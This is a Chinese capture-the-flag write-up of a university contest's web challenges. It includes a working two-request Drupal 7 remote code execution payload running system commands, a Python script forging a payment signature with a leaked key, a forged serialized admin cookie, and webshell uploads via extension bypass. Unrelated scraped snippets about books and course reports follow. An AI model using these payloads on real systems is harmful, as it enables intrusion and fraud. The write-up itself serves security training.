CUMT第一輪雙月賽Web題解

2021-09-03 08:12:16 字數 3734 閱讀 1584

這個題目作為web題的第乙個題難度剛好,很基礎的漏洞點,就考了個檔案上傳,上來直接用phtml就可以繞過,但是給出來的hint是.htaccess,可能是我非預期了?

菜刀鏈結獲取flag

這是乙個drupal 7的cve,照著構造payload就好,payload 分為兩個請求。 先將 payload 注入快取中,構造下面的payload,傳送乙個post包

post請求:/?q=user/password&name[%23post_render]=system&name[%23type]=markup&name[%23markup]=ls%20/

post內容:form_id=user_pass&_triggering_element_name=name

獲取form_build_id的value值:

然後再post傳送執行的包:/?q=file/ajax/name/%23value/form-b7pp9hukwcqbeuhz1gz79qwxv0krb5yxugowaozspru這裡也需要form_build_id的值,post的內容也是:form_build_id=form-b7pp9hukwcqbeuhz1gz79qwxv0krb5yxugowaozspru成功執行命令,這裡注意一下參考文章裡面的passthru命令用不了,只能改為system才能執行相關命令,所以上面快取的時候換了用system函式

再來一次cat /flag的操作就可以讀取flag了

這個題是個**審計的題目,先把原始碼給down下來

開啟這個**發現有登陸註冊功能,以及購買flag的功能,但是這裡面要想得到真正的flag卻需要888積分才可以購買,這個時候就感覺應該是越權購買flag的漏洞了。。。。

發現原始碼裡面有資料庫檔案開啟看一下,發現是存在管理員的,並且id是16,這個東西後期有用,而且他有30000積分,夠買很多flag了,還有商品id 38也可以得知

看到**裡面的setting檔案,有從secret.key讀出來的秘鑰

看一下裡面的秘鑰,一定要注意這裡還有個回車啊啊啊啊,後邊偽造簽名有用

重點關注這段**

這裡可以看出單單對商品方做了校驗(自檢驗),那購買者呢?不存在對其的任何校驗,也就是沒有做好雙向的校驗,這也說明我們可以從偽造購買者的方面去入手,讓別人付錢23333

根據它裡面的**去構造signature就好了

from hashlib import md5

random_secret_key_for_payment_signature =

'zhinianyuxin\n'

form =

str2sign = random_secret_key_for_payment_signature +

'&'.join(

[f'='

for i in form]

)str2sign3= str2sign.encode(

'utf-8'

)sign = md5(str2sign3)

.hexdigest(

)print

(sign)

發包構造一下得到flag,注意紅色的地方也要做相應的修改,發包得到flag

這個題目就是最近幾天剛爆出來的tp5遠端getshell的漏洞,直接上網搜payload,參考了這篇文章:

我用的是下面的payload:

最後獲取flag

一進去之後會發現login功能沒反應,而upload頁面也需要管理員許可權,肯定是要偽造自己是管理員的身份然後去挖掘檔案上傳的漏洞,檢視源**無果後順手看看robots.txt,發現裡面有登入的位址

user-agent: *

disallow: index.php?r=site/loginuser_1

然後就可以進去登陸的頁面,再次檢視源**發現作者的資訊

順手去查一下,發現可以用test/cib_sec登入但不是admin,而且洩露的**裡面說明了可以偽造cookie,cookie名稱是cib_security,是一段經過序列化的東西,到時候就可以偽造了

##readme.md

*** author: cib_zhinianyuxin.com

it's just a system which is not completed , there are some tips:

you can use test/cib_sec to login ,but you are not admin!

only admin can upload file ,but whichone can not bypass my rules.

/**$sign = array(

'id'=>$model->id,

'name'=>$model->username,

'sign'=>md5($model->id.$model->username),

);$_cookie['cib_security'] = serialize($sign);

**/

以test身份登入後把cookie拿出來然後解碼

然後把裡面的md5解一下發現是2test,那我們就構造乙個1admin,構造如下的序列

a:3
再次經過url編碼然後儲存一下cookie就可以以admin身份登入,接上來就是檔案上傳的部分了,這裡的檔案上傳就是個很簡單的字尾名繞過,我試了賊久,這個字尾名有點偏,用的pht,然後發包上傳一句話木馬,菜刀鏈結,成功獲取flag

這個題目確實拓寬了新思路,做了好久才做出來由於特殊原因呢,就不發詳細writeup了。。。。

這一次把web給ak了,真是舒服吶23333,截個圖留念一下

第一輪播報

做為網管員,可能大家感受最深的就是近兩年網管類圖書非常多,選擇餘地非常大,而且都是以套書的形式出現的。在 2004 年前,要選擇一套比較適合自己的書的話,只能是四處挑選,東拼西湊。但無論如何都選不好一套最經濟,最實用的書,因為許多書都有重複之處。而且因為都是單本圖書,沒系統性可言。現在好了,自我在 ...

助教週報(第一輪)

課程名 軟體工程綜合實踐 學生年級及面向專業 計科的大資料方向,嵌入式,和金融實驗班 主修計算機 的同學 人數 130 學時 30 學分 1.5 learning by doing 個人程式設計作業 結對作業 團隊作業 目標 幫助同學們更好地學習本課程 職責 根據課程安排布置作業 幫助同學們解決遇到...

第一輪訓練總結

第一輪訓練結束,自己完成的不太好,20道題到目前只做了17道,還有1664,1011,1050沒過。不過這三天收穫也是蠻多的,因和學長毗鄰,可謂近水樓台先得月,我從他們那裡學到了許多好的方法,請教也比較容易,不用通過網路,直接跨越時空,一擺頭就可以問了,嘻嘻,pku的題味道的確不一般,比較幹,水題很...